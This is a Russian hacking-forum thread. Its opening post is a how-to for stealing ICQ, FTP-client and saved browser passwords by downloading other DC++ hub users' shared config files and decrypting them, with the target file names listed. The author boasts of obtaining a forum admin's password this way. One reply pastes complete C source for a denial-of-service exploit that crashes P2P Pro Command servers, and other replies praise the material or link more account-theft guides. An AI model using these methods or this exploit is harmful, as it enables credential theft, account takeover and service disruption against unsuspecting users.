Мини мануал о том, что можно вытворять на хабе. Все, ниже изложенное было придумано и написано мной, мб эта тема уже поднималась. 1. Угон icq. Всем известно, что пассы от кипа содержаться в файле config.ini. Очень много юзверей, расшаривающих свои program files в которых зачастую находится дира qip. Далее все просто, идем поиск, вписываем config.ini, ищем. Перед тем как сливать все найденные конфиги, обязательно смотрите путь до этого файла, дабы не слить шлак. (Примерный путь до конфига: QIP/user/nomerICQ/config.ini) После того, как мы слили конфиг расшифровываем его прогой МПР . (Жмем «мастер», выбираем нужный модуль, ставим путь до скачанного конфига, смотрим пасс=) Аналогичным образом можно тырить пассы от R&Q, файл конфига - andrq.ini В случае с клиентами Mirana, Icq 5, Odigo, Pidgin нужно тянуть всю папку. 2. Угон фтп. Все аналогично. Клиенты/файлы с конфигами. BulletProof FTP Client - bpftp.dat FileZilla - FileZilla.xml FTP Commander - ftplist.txt Total Commander - wcx_ftp.ini Ищем конфиги, сливаем, расшифровываем. 3. Сохраненные в браузерах данные. (Protected Storage). Opera - wand.dat Mozilla Firefox - *.s *.txt (лучше тянуть всю папку) Internet Explorer – неебу (также тянем всю папку) Далее аналогично, сливаем, расшифровываем той же МПР. Есть задумка, тырить серты от Вм для входа в кипер лайт.. Но пока я не пробовал реализовать эту идею. 4. Не палим содержимое винта. Часто бывает так, что для нормальной загрузки файлов с дц++ нужно расшарить нное кол-во гб, режим "за стеклом" лишь запрещает закачку другим юзерам ваших расшаренных файлов, но не просмотр названий и путей содержимого. А нам палить содержимое винта не нужно. Можно открыть любой файл хекс редактором и напихать в ручную в конец всякого говна.. Но 10гб говна это жестоко=) Для этого можно заюзать прогу Rubbish 1.0 , она добавялет указанное количество мусора в конец файла. Примечание. Всегда внимательно смотрите ники юзеров у кого сливаете конфиги, ибо нередко слабоумные админы/модеры известных или "нужных" проектов расшаривают свою конфиденциальную инфу. (у меня получалось слить конфиг от оперы одмина нашего локального форума, где у него лежал пасс от админки. Хотя до этого, его форум йа пытался похекать несколько дней) После прочтения статьи внимательно просмотрите ваши расшаренные файлы). Удачи всем! (c) WedRRRySS Интересное по теме: Флудер ДЦ++ http://forum.antichat.ru/thread36241.html Выбивание юзверей из сети http://forum.xakep.ru/m_770333/tm.htm
TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...
Exploit EVILGMP, отрубает серв)) PHP: /* P2P Pro Command DOS Exploit ------------------------------------ Infam0us Gr0up - Securiti Research Info: infamous.2hell.com Vendor URL: http://www.digital-revolution.org/P2PPro.html */ #include <string.h> #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char doscore[] = "\x3f\x3f\xbc\x59\x70 " "\x32\x70\x3f\xe1 " "\x2b\x5c\x3f\xa6\xeb\xa6" "\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6" "\x50\x4f\x57\x4e\x45\x44\x2e\x74" "\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6" "\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET inetdos; if (argc < 2) { printf(" P2P Pro Command DOS Exploit \n", argv[0]); printf(" --------------------------------------\n", argv[0]); printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]); printf("[-]Usage: %s [target] [port]\n", argv[0]); printf("[?]Exam: %s localhost 7802\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 7802; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); inetdos = socket(AF_INET, SOCK_STREAM, 0); if(inetdos==INVALID_SOCKET) { printf("Socket ERROR \n"); exit(1); } printf(" P2P Pro Command DOS Exploit \n", argv[0]); printf(" --------------------------------------\r\n\n", argv[0]); printf("Resolve host... "); if ((pTarget = gethostbyname(target)) == NULL) { printf("FAILED \n", argv[0]); exit(1); } printf("[OK]\n "); memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("[+] Connecting... "); if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("FAILED\n"); exit(1); } printf("[OK]\n"); printf("Target listen.. \n"); printf("Sending bad procedure... "); if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) { printf("ERROR\n"); closesocket(inetdos); exit(1); } printf("[OK]\n "); printf("[+] Server SHUTDOWNED!\n"); closesocket(inetdos); WSACleanup(); return 0; }
статья шлак имхо.... расшаривают папку програм файлс наверно токо блондинки и домохозяйки, которые врядли знают как это сдалать и зачем. и файл со шлаком на 10гиг это вообще бред... 2 Solide Snake: tnx за сплоит)
1) Уже было, давно сам поднимал http://forum.antichat.ru/thread49288.html 2) Почему только DC++? 3) маловато для статьи. Но все равно удачи в начинаниях=)
Молодец,что постарался написать,но увы таких статей выходит ой как часто... Вот это меян безумно насмешило...хотя для совсем новичков пойдет ЗЫ:Не обижайся....я плюсиге поставил =)
ну почему же, норм статья, для начинающих сойдет, так щас пароль чей-то узнал, зашел в аську, потрепался))
ну ладно, наверно это утверждение не актуально... если умно расшарить, может быть полезно разве что людям которым больше нечего шарить... + на большинстве хабов на которых я был, шарить системные папки (windos, program files, tmp, document and settigns etc.) запрещено правилами....
Давным давно снимал видео по угону аськи через DС++ вот кому интересно смотрите Ifolder WebFile pass:antichat.ru
